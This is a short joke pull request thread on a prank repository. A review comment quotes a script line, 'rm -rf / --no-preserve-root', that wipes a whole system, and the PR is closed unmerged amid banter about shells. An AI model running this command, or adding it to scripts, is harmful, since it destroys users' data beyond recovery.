lul
Narwaffle22/df-your-mom pull request #10
Opened 2022-09-22 17:13 UTC by subby2006

2022-09-23 16:10 UTC, Narwaffle22 commented
no

2022-09-23 16:11 UTC, Dlol commented
sudo rm -rf /deez/nuts

2022-09-23 16:20 UTC, Dlol requested changes
make better code

2022-09-23 16:20 UTC, Dlol commented on funnyscript.sh
> +rm -rf / --no-preserve-root
not everyone uses bash as you know

2022-09-23 16:50 UTC, closed without merging

2022-09-25 16:59 UTC, subby2006 commented on funnyscript.sh
> +rm -rf / --no-preserve-root
no you bash is the superior shell

2022-09-28 15:49 UTC, subby2006 commented
> no

yes